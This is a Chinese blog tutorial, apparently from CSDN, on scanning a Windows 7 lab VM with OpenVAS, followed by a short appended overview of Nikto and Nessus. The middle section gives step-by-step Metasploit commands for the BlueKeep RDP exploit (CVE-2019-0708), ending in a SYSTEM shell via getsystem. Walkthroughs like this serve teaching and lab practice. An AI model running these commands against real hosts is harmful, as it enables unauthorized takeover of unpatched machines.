漏洞扫描和利用

声明:禁止用作非法目的,谢绝一切形式的转载。

这里对OpenVas进行了简单的介绍。这篇文章着重介绍通过OpenVas扫描出来漏洞之后,如何利用这些漏洞达到获取被入侵机器"肉鸡"的shell(也就是控制权)。

OpenVAS

GSM协议

在这里插入图片描述NTP – Time synchronization
• Connecting to 123/udp
• Mandatory
• Not encrypted
• May use internal NTP server
Feeds (see below)
• Direct

  • Connecting to 24/tcp or 443/tcp
  • Direct internet access required

• Via proxy

  • Connecting to internal HTTP proxy supporting CONNECT method on configurable port

• Connecting to apt.greenbone.net and feed.greenbone.net
• Mandatory on stand-alone and master appliances
• Used protocol is SSH
• Encrypted and bidirectionally authenticated via SSH

  • Server: public key
  • Client: public key

在这里插入图片描述
在这里插入图片描述

术语

Alert: An alert is an action which can be triggered by certain events. In most cases, this means the output of a notification, e.g., an e-mail in case of new found vulnerabilities.

CVE: Common Vulnerabilities and Exposures (CVE) is a dictionary of publicly known information security vulnerabilities and exposures.

QoD: The Quality of Detection (QoD) is a value between 0 % and 100 % describing the reliability of the executed vulnerability detection or product detection.

OpenVas扫描

通过"Configuration"设置扫描目标(本文使用Vmware虚拟机 Win7 64 SP1操作系统), 通过"Scan" 设置扫描任务。扫描结果如下:
在这里插入图片描述
查看nginx条目(Vmware虚拟机 Win7 64 SP1操作系统)报告信息:
在这里插入图片描述从扫描结果中可以看出存在CVE-2019-0708漏洞,这是一个由微软的RDP服务引起的任意代码执行漏洞,漏洞的详细信息如下。
在这里插入图片描述

漏洞利用

  1. 开启msf
msfconsole
  1. 搜索模块
search cve-2019-0708
  1. 选择攻击模块
use 1

在这里插入图片描述

  1. 选择攻击目标
show targets 
set target 2

在这里插入图片描述

  1. 设置远程目标ip
set rhost 192.168.42.148

在这里插入图片描述

  1. 执行
exploit

在这里插入图片描述通过getsystem提权获得最高权限system,然后就真的可以为所欲为了。

写在最后

Win7系统的漏洞还是很多的,目前微软已经停止了对Win7系统的维护,使用Win7系统要谨慎。当然这并不能说明win10系统就安全了,漏洞也是多的可怕。

对于远程桌面,谨慎开启。3389这个端口,无论在微软的那个系统中,都是漏洞泛滥之地。

公众号

更多内容,欢迎关注我的微信公众号:无情剑客。
在这里插入图片描述

### 使用Kali Linux进行漏洞扫描渗透测试 #### 工具概述 Kali Linux 是一款专门为渗透测试设计的操作系统,内置了大量的安全工具。其中常用的漏洞扫描工具有 Nikto Nessus。 #### Nikto 的使用方法 Nikto 是一个开源的 Web 服务器扫描器,能够检测超过 6700 种潜在危险文件/程序,并能识别过期或安装不当的软件[^1]。启动 Nikto 扫描非常简单,在终端输入如下命令即可: ```bash nikto -h http://targetwebsite.com ``` 这条命令会针对指定的目标网站执行基本的安全检查并报告发现的问题。 #### Nessus 的配置与运行 Nessus 是由 Tenable Network Security 开发的强大而全面的远程安全扫描平台,支持多种操作系统环境下的部署,包括但不限于 Windows、Linux 等。虽然官方版本提供了付费订阅服务来获取最新威胁情报更新,但对于初步学习来说,社区版已经足够满足需求[^4]。为了在 Kali 中设置 Nessus,请按照以下步骤操作: - 下载适合当前系统的 .deb 安装包; - 利用 `dpkg` 或者图形界面完成安装过程; - 启动服务并通过浏览器访问管理页面 (默认地址为 https://localhost:8834/) 进行初始化配置; - 创建新任务并对目标 IP 地址发起扫描请求; 需要注意的是,对于更深入的应用层攻击面审查,则应考虑采用专门面向 web 应用的安全评估解决方案,比如 AppScan、AWVS、OWASP ZAP 及 Burp Suite Professional 等产品[^2]。 #### 漏洞数据库的作用 除了上述提到的具体技术手段外,维护好本地或云端的漏洞数据库同样重要。这些数据集不仅有助于快速定位已知风险点,还可能揭示出某些特定场景下的零日缺陷模式,从而指导后续的手动挖掘工作。同时,它们也是构建自动化响应机制不可或缺的一部分,可协助开发者及时修补存在的安全隐患[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

helloworddm

你的鼓励是我创作最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值